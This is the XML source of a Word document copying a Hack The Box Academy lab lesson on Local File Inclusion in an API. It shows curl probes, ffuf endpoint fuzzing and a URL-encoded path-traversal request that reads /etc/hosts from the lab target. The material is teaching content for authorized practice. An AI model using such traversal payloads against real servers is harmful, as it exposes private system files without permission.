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47C523" wp14:paraId="7591C729" wp14:textId="15C34536">
      <w:pPr>
        <w:pStyle w:val="Heading1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Local File Inclusion (LFI)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="77627120" wp14:textId="385760EA"/>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3B47C523" wp14:paraId="64370FC6" wp14:textId="65C9B05B">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20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Local File Inclusion (LFI) is an attack that affects web applications and APIs alike. It allows an attacker to read internal files and sometimes execute code on the server via a series of ways, one being Apache Log Poisoning. Our </w:t>
      </w:r>
      <w:hyperlink r:id="Rc96bf907000c48c5">
        <w:r w:rsidRPr="3B47C523" w:rsidR="3B47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File Inclusion</w:t>
        </w:r>
      </w:hyperlink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module covers LFI in detail.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3B47C523" wp14:paraId="4FE5995A" wp14:textId="2C765F76">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20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Let us assess together an API that is vulnerable to Local File Inclusion.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3B47C523" wp14:paraId="035DCA13" wp14:textId="68B3B76B">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20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Proceed to the end of this section and click on Click here to spawn the target system! or the Reset Target icon. Use the provided Pwnbox or a local VM with the supplied VPN key to reach the target API and follow along.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3B47C523" wp14:paraId="442DAA82" wp14:textId="0B405964">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20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Suppose we are assessing such an API residing in </w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="3B47C523" w:rsidR="3B47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IP&gt;:3000/api.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3B47C523" wp14:paraId="2382BED6" wp14:textId="482C6315">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20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Let us first interact with it.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3B47C523" wp14:paraId="404639E1" wp14:textId="644F2B15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yovecio@htb[/htb]$ curl </w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="3B47C523" w:rsidR="3B47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IP&gt;:3000/api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{"status":"UP"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3B47C523" wp14:paraId="6E2BF86C" wp14:textId="5733CF59">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20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We don't see anything helpful except the indication that the API is up and running. Let us perform API endpoint fuzzing using </w:t>
      </w:r>
      <w:r w:rsidRPr="3B47C523" w:rsidR="3B47C52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ffuf</w:t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and the </w:t>
      </w:r>
      <w:hyperlink r:id="Red48a6268653439e">
        <w:r w:rsidRPr="3B47C523" w:rsidR="3B47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common-api-endpoints-mazen160.txt</w:t>
        </w:r>
      </w:hyperlink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list, as follows.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3B47C523" wp14:paraId="5078E9A9" wp14:textId="72D482CB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yovecio@htb[/htb]$ ffuf -w "/home/htb-acxxxxx/Desktop/Useful Repos/SecLists/Discovery/Web-Content/common-api-endpoints-mazen160.txt" -u '</w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="3B47C523" w:rsidR="3B47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IP&gt;:3000/api/FUZZ'</w:t>
      </w:r>
      <w:r>
        <w:br/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/'___\  /'___\           /'___\       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/\ \__/ /\ \__/  __  __  /\ \__/       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\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      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\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      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\ \_\   \ \_\  \ \____/  \ \_\       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\/_/    \/_/   \/___/    \/_/       </w:t>
      </w:r>
      <w:r>
        <w:br/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v1.3.1 Kali Exclusive &lt;3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________________________________________________</w:t>
      </w:r>
      <w:r>
        <w:br/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Method           : GET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URL              : </w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="3B47C523" w:rsidR="3B47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IP&gt;:3000/api/FUZZ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Wordlist         : FUZZ: /home/htb-acxxxxx/Desktop/Useful Repos/SecLists/Discovery/Web-Content/common-api-endpoints-mazen160.txt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Follow redirects : false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Calibration      : false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Timeout          : 10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Threads          : 40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Matcher          : Response status: 200,204,301,302,307,401,403,405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________________________________________________</w:t>
      </w:r>
      <w:r>
        <w:br/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[40/174] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors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download                [Status: 200, Size: 71, Words: 5, Lines: 1]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:: Progress: [87/174] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors:: 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Progress: [174/174] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Error:: 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Progress: [174/174] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3B47C523" wp14:paraId="64F8A844" wp14:textId="384136C4">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20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It looks like /api/download is a valid API endpoint. Let us interact with it.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3B47C523" wp14:paraId="7674E954" wp14:textId="68446D9B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yovecio@htb[/htb]$ curl </w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="3B47C523" w:rsidR="3B47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IP&gt;:3000/api/download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{"success":false,"error":"Input the filename via /download/&lt;filename&gt;"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3B47C523" wp14:paraId="6D055D5B" wp14:textId="583D5D34">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20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We need to specify a file, but we do not have any knowledge of stored files or their naming scheme. We can try mounting a Local File Inclusion (LFI) attack, though.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3B47C523" wp14:paraId="798451A6" wp14:textId="370E5D43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yovecio@htb[/htb]$ curl "</w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="3B47C523" w:rsidR="3B47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IP&gt;:3000/api/download/..%2f..%2f..%2f..%2fetc%2fhosts"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127.0.0.1 localhost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127.0.1.1 nix01-websvc</w:t>
      </w:r>
      <w:r>
        <w:br/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# The following lines are desirable for IPv6 capable hosts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::1     ip6-localhost ip6-loopback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fe00::0 ip6-localnet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ff00::0 ip6-mcastprefix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ff02::1 ip6-allnodes</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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ff02::2 ip6-allrouters</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3B47C523" wp14:paraId="1EFBCCCF" wp14:textId="1D083908">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="3B47C523" w:rsidR="3B47C523">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>The API is indeed vulnerable to Local File Inclusion!</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3B47C523" wp14:paraId="2DC08235" wp14:textId="17E931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5D612"/>
    <w:rsid w:val="03E5D612"/>
    <w:rsid w:val="3B47C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D612"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B6DC3647-E2E2-455A-B0A1-461A7B4294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cademy.hackthebox.com/module/details/23" TargetMode="External" Id="Rc96bf907000c48c5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/common-api-endpoints-mazen160.txt" TargetMode="External" Id="Red48a626865343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2023-12-14T11:16:10.8440093Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-14T11:16:51.8476766Z</dcterms:modified>
  <dc:creator>Aleksandar Milosavljevic</dc:creator>
  <lastModifiedBy>Aleksandar Milosavljevic</lastModifiedBy>
</coreProperties>
</file>